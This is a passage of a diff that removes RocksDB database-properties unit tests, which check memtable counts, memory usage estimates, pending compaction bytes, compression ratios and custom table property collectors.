-    ParseTablePropertiesString(tp_string, &tp);
-    ASSERT_EQ(sum_tp.data_size, tp.data_size);
-    ASSERT_EQ(sum_tp.index_size, tp.index_size);
-    ASSERT_EQ(sum_tp.filter_size, tp.filter_size);
-    ASSERT_EQ(sum_tp.raw_key_size, tp.raw_key_size);
-    ASSERT_EQ(sum_tp.raw_value_size, tp.raw_value_size);
-    ASSERT_EQ(sum_tp.num_data_blocks, tp.num_data_blocks);
-    ASSERT_EQ(sum_tp.num_entries, tp.num_entries);
-    if (table > 3) {
-      GetExpectedTableProperties(&expected_tp, kKeySize, kValueSize,
-                                 kKeysPerTable, table, kBloomBitsPerKey,
-                                 table_options.block_size);
-      // Gives larger bias here as index block size, filter block size,
-      // and data block size become much harder to estimate in this test.
-      VerifyTableProperties(tp, expected_tp, 0.5, 0.4, 0.4, 0.25);
-    }
-  }
-}
-
-TEST_F(DBPropertiesTest, NumImmutableMemTable) {
-  do {
-    Options options = CurrentOptions();
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    options.max_write_buffer_number = 4;
-    options.min_write_buffer_number_to_merge = 3;
-    options.max_write_buffer_number_to_maintain = 4;
-    options.write_buffer_size = 1000000;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    std::string big_value(1000000 * 2, 'x');
-    std::string num;
-    uint64_t value;
-    SetPerfLevel(kEnableTime);
-    ASSERT_TRUE(GetPerfLevel() == kEnableTime);
-
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k1", big_value));
-    ASSERT_TRUE(dbfull()->GetProperty(handles_[1],
-                                      "rocksdb.num-immutable-mem-table", &num));
-    ASSERT_EQ(num, "0");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], DB::Properties::kNumImmutableMemTableFlushed, &num));
-    ASSERT_EQ(num, "0");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ(num, "1");
-    get_perf_context()->Reset();
-    Get(1, "k1");
-    ASSERT_EQ(1, static_cast<int>(get_perf_context()->get_from_memtable_count));
-
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k2", big_value));
-    ASSERT_TRUE(dbfull()->GetProperty(handles_[1],
-                                      "rocksdb.num-immutable-mem-table", &num));
-    ASSERT_EQ(num, "1");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ(num, "1");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-imm-mem-tables", &num));
-    ASSERT_EQ(num, "1");
-
-    get_perf_context()->Reset();
-    Get(1, "k1");
-    ASSERT_EQ(2, static_cast<int>(get_perf_context()->get_from_memtable_count));
-    get_perf_context()->Reset();
-    Get(1, "k2");
-    ASSERT_EQ(1, static_cast<int>(get_perf_context()->get_from_memtable_count));
-
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k3", big_value));
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.cur-size-active-mem-table", &num));
-    ASSERT_TRUE(dbfull()->GetProperty(handles_[1],
-                                      "rocksdb.num-immutable-mem-table", &num));
-    ASSERT_EQ(num, "2");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ(num, "1");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-imm-mem-tables", &num));
-    ASSERT_EQ(num, "2");
-    get_perf_context()->Reset();
-    Get(1, "k2");
-    ASSERT_EQ(2, static_cast<int>(get_perf_context()->get_from_memtable_count));
-    get_perf_context()->Reset();
-    Get(1, "k3");
-    ASSERT_EQ(1, static_cast<int>(get_perf_context()->get_from_memtable_count));
-    get_perf_context()->Reset();
-    Get(1, "k1");
-    ASSERT_EQ(3, static_cast<int>(get_perf_context()->get_from_memtable_count));
-
-    ASSERT_OK(Flush(1));
-    ASSERT_TRUE(dbfull()->GetProperty(handles_[1],
-                                      "rocksdb.num-immutable-mem-table", &num));
-    ASSERT_EQ(num, "0");
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], DB::Properties::kNumImmutableMemTableFlushed, &num));
-    ASSERT_EQ(num, "3");
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.cur-size-active-mem-table", &value));
-    // "192" is the size of the metadata of two empty skiplists, this would
-    // break if we change the default skiplist implementation
-    ASSERT_GE(value, 192);
-
-    uint64_t int_num;
-    uint64_t base_total_size;
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.estimate-num-keys", &base_total_size));
-
-    ASSERT_OK(dbfull()->Delete(writeOpt, handles_[1], "k2"));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k3", ""));
-    ASSERT_OK(dbfull()->Delete(writeOpt, handles_[1], "k3"));
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.num-deletes-active-mem-table", &int_num));
-    ASSERT_EQ(int_num, 2U);
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &int_num));
-    ASSERT_EQ(int_num, 3U);
-
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k2", big_value));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "k2", big_value));
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.num-entries-imm-mem-tables", &int_num));
-    ASSERT_EQ(int_num, 4U);
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.num-deletes-imm-mem-tables", &int_num));
-    ASSERT_EQ(int_num, 2U);
-
-    ASSERT_TRUE(dbfull()->GetIntProperty(
-        handles_[1], "rocksdb.estimate-num-keys", &int_num));
-    ASSERT_EQ(int_num, base_total_size + 1);
-
-    SetPerfLevel(kDisable);
-    ASSERT_TRUE(GetPerfLevel() == kDisable);
-  } while (ChangeCompactOptions());
-}
-
-// TODO(techdept) : Disabled flaky test #12863555
-TEST_F(DBPropertiesTest, DISABLED_GetProperty) {
-  // Set sizes to both background thread pool to be 1 and block them.
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  test::SleepingBackgroundTask sleeping_task_high;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_high, Env::Priority::HIGH);
-
-  Options options = CurrentOptions();
-  WriteOptions writeOpt = WriteOptions();
-  writeOpt.disableWAL = true;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.level0_file_num_compaction_trigger = 1;
-  options.compaction_options_universal.size_ratio = 50;
-  options.max_background_compactions = 1;
-  options.max_background_flushes = 1;
-  options.max_write_buffer_number = 10;
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 0;
-  options.write_buffer_size = 1000000;
-  Reopen(options);
-
-  std::string big_value(1000000 * 2, 'x');
-  std::string num;
-  uint64_t int_num;
-  SetPerfLevel(kEnableTime);
-
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_EQ(int_num, 0U);
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-live-data-size", &int_num));
-  ASSERT_EQ(int_num, 0U);
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k1", big_value));
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.num-immutable-mem-table", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.mem-table-flush-pending", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.compaction-pending", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ(num, "1");
-  get_perf_context()->Reset();
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k2", big_value));
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.num-immutable-mem-table", &num));
-  ASSERT_EQ(num, "1");
-  ASSERT_OK(dbfull()->Delete(writeOpt, "k-non-existing"));
-  ASSERT_OK(dbfull()->Put(writeOpt, "k3", big_value));
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.num-immutable-mem-table", &num));
-  ASSERT_EQ(num, "2");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.mem-table-flush-pending", &num));
-  ASSERT_EQ(num, "1");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.compaction-pending", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ(num, "2");
-  // Verify the same set of properties through GetIntProperty
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.num-immutable-mem-table", &int_num));
-  ASSERT_EQ(int_num, 2U);
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.mem-table-flush-pending", &int_num));
-  ASSERT_EQ(int_num, 1U);
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.compaction-pending", &int_num));
-  ASSERT_EQ(int_num, 0U);
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.estimate-num-keys", &int_num));
-  ASSERT_EQ(int_num, 2U);
-
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_EQ(int_num, 0U);
-
-  sleeping_task_high.WakeUp();
-  sleeping_task_high.WaitUntilDone();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k4", big_value));
-  ASSERT_OK(dbfull()->Put(writeOpt, "k5", big_value));
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.mem-table-flush-pending", &num));
-  ASSERT_EQ(num, "0");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.compaction-pending", &num));
-  ASSERT_EQ(num, "1");
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ(num, "4");
-
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  // Wait for compaction to be done. This is important because otherwise RocksDB
-  // might schedule a compaction when reopening the database, failing assertion
-  // (A) as a result.
-  dbfull()->TEST_WaitForCompact();
-  options.max_open_files = 10;
-  Reopen(options);
-  // After reopening, no table reader is loaded, so no memory for table readers
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_EQ(int_num, 0U);  // (A)
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.estimate-num-keys", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  // After reading a key, at least one table reader is loaded.
-  Get("k5");
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.estimate-table-readers-mem", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  // Test rocksdb.num-live-versions
-  {
-    options.level0_file_num_compaction_trigger = 20;
-    Reopen(options);
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 1U);
-
-    // Use an iterator to hold current version
-    std::unique_ptr<Iterator> iter1(dbfull()->NewIterator(ReadOptions()));
-
-    ASSERT_OK(dbfull()->Put(writeOpt, "k6", big_value));
-    Flush();
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 2U);
-
-    // Use an iterator to hold current version
-    std::unique_ptr<Iterator> iter2(dbfull()->NewIterator(ReadOptions()));
-
-    ASSERT_OK(dbfull()->Put(writeOpt, "k7", big_value));
-    Flush();
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 3U);
-
-    iter2.reset();
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 2U);
-
-    iter1.reset();
-    ASSERT_TRUE(
-        dbfull()->GetIntProperty("rocksdb.num-live-versions", &int_num));
-    ASSERT_EQ(int_num, 1U);
-  }
-}
-
-TEST_F(DBPropertiesTest, ApproximateMemoryUsage) {
-  const int kNumRounds = 10;
-  // TODO(noetzli) kFlushesPerRound does not really correlate with how many
-  // flushes happen.
-  const int kFlushesPerRound = 10;
-  const int kWritesPerFlush = 10;
-  const int kKeySize = 100;
-  const int kValueSize = 1000;
-  Options options;
-  options.write_buffer_size = 1000;  // small write buffer
-  options.min_write_buffer_number_to_merge = 4;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options = CurrentOptions(options);
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-
-  std::vector<Iterator*> iters;
-
-  uint64_t active_mem;
-  uint64_t unflushed_mem;
-  uint64_t all_mem;
-  uint64_t prev_all_mem;
-
-  // Phase 0. The verify the initial value of all these properties are the same
-  // as we have no mem-tables.
-  dbfull()->GetIntProperty("rocksdb.cur-size-active-mem-table", &active_mem);
-  dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-  dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-  ASSERT_EQ(all_mem, active_mem);
-  ASSERT_EQ(all_mem, unflushed_mem);
-
-  // Phase 1. Simply issue Put() and expect "cur-size-all-mem-tables" equals to
-  // "size-all-mem-tables"
-  for (int r = 0; r < kNumRounds; ++r) {
-    for (int f = 0; f < kFlushesPerRound; ++f) {
-      for (int w = 0; w < kWritesPerFlush; ++w) {
-        Put(RandomString(&rnd, kKeySize), RandomString(&rnd, kValueSize));
-      }
-    }
-    // Make sure that there is no flush between getting the two properties.
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-    dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-    // in no iterator case, these two number should be the same.
-    ASSERT_EQ(unflushed_mem, all_mem);
-  }
-  prev_all_mem = all_mem;
-
-  // Phase 2. Keep issuing Put() but also create new iterators. This time we
-  // expect "size-all-mem-tables" > "cur-size-all-mem-tables".
-  for (int r = 0; r < kNumRounds; ++r) {
-    iters.push_back(db_->NewIterator(ReadOptions()));
-    for (int f = 0; f < kFlushesPerRound; ++f) {
-      for (int w = 0; w < kWritesPerFlush; ++w) {
-        Put(RandomString(&rnd, kKeySize), RandomString(&rnd, kValueSize));
-      }
-    }
-    // Force flush to prevent flush from happening between getting the
-    // properties or after getting the properties and before the new round.
-    Flush();
-
-    // In the second round, add iterators.
-    dbfull()->GetIntProperty("rocksdb.cur-size-active-mem-table", &active_mem);
-    dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-    dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-    ASSERT_GT(all_mem, active_mem);
-    ASSERT_GT(all_mem, unflushed_mem);
-    ASSERT_GT(all_mem, prev_all_mem);
-    prev_all_mem = all_mem;
-  }
-
-  // Phase 3. Delete iterators and expect "size-all-mem-tables" shrinks
-  // whenever we release an iterator.
-  for (auto* iter : iters) {
-    delete iter;
-    dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-    // Expect the size shrinking
-    ASSERT_LT(all_mem, prev_all_mem);
-    prev_all_mem = all_mem;
-  }
-
-  // Expect all these three counters to be the same.
-  dbfull()->GetIntProperty("rocksdb.cur-size-active-mem-table", &active_mem);
-  dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-  dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-  ASSERT_EQ(active_mem, unflushed_mem);
-  ASSERT_EQ(unflushed_mem, all_mem);
-
-  // Phase 5. Reopen, and expect all these three counters to be the same again.
-  Reopen(options);
-  dbfull()->GetIntProperty("rocksdb.cur-size-active-mem-table", &active_mem);
-  dbfull()->GetIntProperty("rocksdb.cur-size-all-mem-tables", &unflushed_mem);
-  dbfull()->GetIntProperty("rocksdb.size-all-mem-tables", &all_mem);
-  ASSERT_EQ(active_mem, unflushed_mem);
-  ASSERT_EQ(unflushed_mem, all_mem);
-}
-
-TEST_F(DBPropertiesTest, EstimatePendingCompBytes) {
-  // Set sizes to both background thread pool to be 1 and block them.
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  Options options = CurrentOptions();
-  WriteOptions writeOpt = WriteOptions();
-  writeOpt.disableWAL = true;
-  options.compaction_style = kCompactionStyleLevel;
-  options.level0_file_num_compaction_trigger = 2;
-  options.max_background_compactions = 1;
-  options.max_background_flushes = 1;
-  options.max_write_buffer_number = 10;
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 0;
-  options.write_buffer_size = 1000000;
-  Reopen(options);
-
-  std::string big_value(1000000 * 2, 'x');
-  std::string num;
-  uint64_t int_num;
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k1", big_value));
-  Flush();
-  ASSERT_TRUE(dbfull()->GetIntProperty(
-      "rocksdb.estimate-pending-compaction-bytes", &int_num));
-  ASSERT_EQ(int_num, 0U);
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k2", big_value));
-  Flush();
-  ASSERT_TRUE(dbfull()->GetIntProperty(
-      "rocksdb.estimate-pending-compaction-bytes", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  ASSERT_OK(dbfull()->Put(writeOpt, "k3", big_value));
-  Flush();
-  ASSERT_TRUE(dbfull()->GetIntProperty(
-      "rocksdb.estimate-pending-compaction-bytes", &int_num));
-  ASSERT_GT(int_num, 0U);
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(dbfull()->GetIntProperty(
-      "rocksdb.estimate-pending-compaction-bytes", &int_num));
-  ASSERT_EQ(int_num, 0U);
-}
-
-TEST_F(DBPropertiesTest, EstimateCompressionRatio) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  const int kNumL0Files = 3;
-  const int kNumEntriesPerFile = 1000;
-
-  Options options = CurrentOptions();
-  options.compression_per_level = {kNoCompression, kSnappyCompression};
-  options.disable_auto_compactions = true;
-  options.num_levels = 2;
-  Reopen(options);
-
-  // compression ratio is -1.0 when no open files at level
-  ASSERT_EQ(CompressionRatioAtLevel(0), -1.0);
-
-  const std::string kVal(100, 'a');
-  for (int i = 0; i < kNumL0Files; ++i) {
-    for (int j = 0; j < kNumEntriesPerFile; ++j) {
-      // Put common data ("key") at end to prevent delta encoding from
-      // compressing the key effectively
-      std::string key = ToString(i) + ToString(j) + "key";
-      ASSERT_OK(dbfull()->Put(WriteOptions(), key, kVal));
-    }
-    Flush();
-  }
-
-  // no compression at L0, so ratio is less than one
-  ASSERT_LT(CompressionRatioAtLevel(0), 1.0);
-  ASSERT_GT(CompressionRatioAtLevel(0), 0.0);
-  ASSERT_EQ(CompressionRatioAtLevel(1), -1.0);
-
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-
-  ASSERT_EQ(CompressionRatioAtLevel(0), -1.0);
-  // Data at L1 should be highly compressed thanks to Snappy and redundant data
-  // in values (ratio is 12.846 as of 4/19/2016).
-  ASSERT_GT(CompressionRatioAtLevel(1), 10.0);
-}
-
-#endif  // ROCKSDB_LITE
-
-class CountingUserTblPropCollector : public TablePropertiesCollector {
- public:
-  const char* Name() const override { return "CountingUserTblPropCollector"; }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    std::string encoded;
-    PutVarint32(&encoded, count_);
-    *properties = UserCollectedProperties{
-        {"CountingUserTblPropCollector", message_}, {"Count", encoded},
-    };
-    return Status::OK();
-  }
-
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
-    ++count_;
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  std::string message_ = "Rocksdb";
-  uint32_t count_ = 0;
-};
-
-class CountingUserTblPropCollectorFactory
-    : public TablePropertiesCollectorFactory {
- public:
-  explicit CountingUserTblPropCollectorFactory(
-      uint32_t expected_column_family_id)
-      : expected_column_family_id_(expected_column_family_id),
-        num_created_(0) {}
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    EXPECT_EQ(expected_column_family_id_, context.column_family_id);
-    num_created_++;
-    return new CountingUserTblPropCollector();
-  }
-  const char* Name() const override {
-    return "CountingUserTblPropCollectorFactory";
-  }
-  void set_expected_column_family_id(uint32_t v) {
-    expected_column_family_id_ = v;
-  }
-  uint32_t expected_column_family_id_;
-  uint32_t num_created_;
-};
-
-class CountingDeleteTabPropCollector : public TablePropertiesCollector {
- public:
-  const char* Name() const override { return "CountingDeleteTabPropCollector"; }
-
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
-    if (type == kEntryDelete) {
-      num_deletes_++;
-    }
-    return Status::OK();
-  }
-
-  bool NeedCompact() const override { return num_deletes_ > 10; }
-
-  UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    *properties =
-        UserCollectedProperties{{"num_delete", ToString(num_deletes_)}};
-    return Status::OK();
-  }
-
- private:
-  uint32_t num_deletes_ = 0;
-};
-
-class CountingDeleteTabPropCollectorFactory
-    : public TablePropertiesCollectorFactory {
- public:
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    return new CountingDeleteTabPropCollector();
-  }
-  const char* Name() const override {
-    return "CountingDeleteTabPropCollectorFactory";
-  }
-};
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBPropertiesTest, GetUserDefinedTableProperties) {
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = (1 << 30);
-  options.table_properties_collector_factories.resize(1);
-  std::shared_ptr<CountingUserTblPropCollectorFactory> collector_factory =
-      std::make_shared<CountingUserTblPropCollectorFactory>(0);
-  options.table_properties_collector_factories[0] = collector_factory;
-  Reopen(options);
-  // Create 4 tables
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      db_->Put(WriteOptions(), ToString(table * 100 + i), "val");
-    }
-    db_->Flush(FlushOptions());
-  }
-
-  TablePropertiesCollection props;
-  ASSERT_OK(db_->GetPropertiesOfAllTables(&props));
-  ASSERT_EQ(4U, props.size());
-  uint32_t sum = 0;
-  for (const auto& item : props) {
-    auto& user_collected = item.second->user_collected_properties;
-    ASSERT_TRUE(user_collected.find("CountingUserTblPropCollector") !=
-                user_collected.end());
-    ASSERT_EQ(user_collected.at("CountingUserTblPropCollector"), "Rocksdb");
-    ASSERT_TRUE(user_collected.find("Count") != user_collected.end());
-    Slice key(user_collected.at("Count"));
-    uint32_t count;
-    ASSERT_TRUE(GetVarint32(&key, &count));
-    sum += count;
-  }
-  ASSERT_EQ(10u + 11u + 12u + 13u, sum);
-
-  ASSERT_GT(collector_factory->num_created_, 0U);
-  collector_factory->num_created_ = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-  ASSERT_GT(collector_factory->num_created_, 0U);
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBPropertiesTest, UserDefinedTablePropertiesContext) {
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 3;
-  options.table_properties_collector_factories.resize(1);
-  std::shared_ptr<CountingUserTblPropCollectorFactory> collector_factory =
-      std::make_shared<CountingUserTblPropCollectorFactory>(1);
-  options.table_properties_collector_factories[0] = collector_factory,
-  CreateAndReopenWithCF({"pikachu"}, options);
-  // Create 2 files
-  for (int table = 0; table < 2; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(1, ToString(table * 100 + i), "val");
-    }
-    Flush(1);
-  }
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  collector_factory->num_created_ = 0;
-  // Trigger automatic compactions.
-  for (int table = 0; table < 3; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(1, ToString(table * 100 + i), "val");
-    }
-    Flush(1);
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  collector_factory->num_created_ = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  // Come back to write to default column family
-  collector_factory->num_created_ = 0;
-  collector_factory->set_expected_column_family_id(0);  // default CF
-  // Create 4 tables in default column family
-  for (int table = 0; table < 2; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-  }
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  collector_factory->num_created_ = 0;
-  // Trigger automatic compactions.
-  for (int table = 0; table < 3; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_GT(collector_factory->num_created_, 0U);
-
-  collector_factory->num_created_ = 0;
-  dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-  ASSERT_GT(collector_factory->num_created_, 0U);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBPropertiesTest, TablePropertiesNeedCompactTest) {
-  Random rnd(301);
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = 4096;
-  options.max_write_buffer_number = 8;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 4;
-  options.target_file_size_base = 2048;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.soft_pending_compaction_bytes_limit = 1024 * 1024;
-  options.num_levels = 8;
-  options.env = env_;
-
-  std::shared_ptr<TablePropertiesCollectorFactory> collector_factory =
-      std::make_shared<CountingDeleteTabPropCollectorFactory>();
-  options.table_properties_collector_factories.resize(1);
-  options.table_properties_collector_factories[0] = collector_factory;
-
-  DestroyAndReopen(options);
-
-  const int kMaxKey = 1000;
-  for (int i = 0; i < kMaxKey; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 102)));
-    ASSERT_OK(Put(Key(kMaxKey + i), RandomString(&rnd, 102)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  if (NumTableFilesAtLevel(0) == 1) {
-    // Clear Level 0 so that when later flush a file with deletions,
-    // we don't trigger an organic compaction.
-    ASSERT_OK(Put(Key(0), ""));
-    ASSERT_OK(Put(Key(kMaxKey * 2), ""));
-    Flush();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_EQ(NumTableFilesAtLevel(0), 0);
-
-  {
-    int c = 0;
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    iter->Seek(Key(kMaxKey - 100));
-    while (iter->Valid() && iter->key().compare(Key(kMaxKey + 100)) < 0) {
-      iter->Next();
-      ++c;
-    }
-    ASSERT_EQ(c, 200);
-  }
-
-  Delete(Key(0));
-  for (int i = kMaxKey - 100; i < kMaxKey + 100; i++) {
-    Delete(Key(i));
-  }
-  Delete(Key(kMaxKey * 2));
-
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-
-  {
-    SetPerfLevel(kEnableCount);
-    get_perf_context()->Reset();
-    int c = 0;
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    iter->Seek(Key(kMaxKey - 100));
-    while (iter->Valid() && iter->key().compare(Key(kMaxKey + 100)) < 0) {
-      iter->Next();
-    }
-    ASSERT_EQ(c, 0);
-    ASSERT_LT(get_perf_context()->internal_delete_skipped_count, 30u);
-    ASSERT_LT(get_perf_context()->internal_key_skipped_count, 30u);
-    SetPerfLevel(kDisable);
-  }
-}
-
-TEST_F(DBPropertiesTest, NeedCompactHintPersistentTest) {
-  Random rnd(301);
-
-  Options options;
-  options.create_if_missing = true;
-  options.max_write_buffer_number = 8;
-  options.level0_file_num_compaction_trigger = 10;
-  options.level0_slowdown_writes_trigger = 10;
-  options.level0_stop_writes_trigger = 10;
-  options.disable_auto_compactions = true;
-  options.env = env_;
-
-  std::shared_ptr<TablePropertiesCollectorFactory> collector_factory =
-      std::make_shared<CountingDeleteTabPropCollectorFactory>();
-  options.table_properties_collector_factories.resize(1);
-  options.table_properties_collector_factories[0] = collector_factory;
-
-  DestroyAndReopen(options);
-
-  const int kMaxKey = 100;
-  for (int i = 0; i < kMaxKey; i++) {
-    ASSERT_OK(Put(Key(i), ""));
-  }
-  Flush();
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  for (int i = 1; i < kMaxKey - 1; i++) {
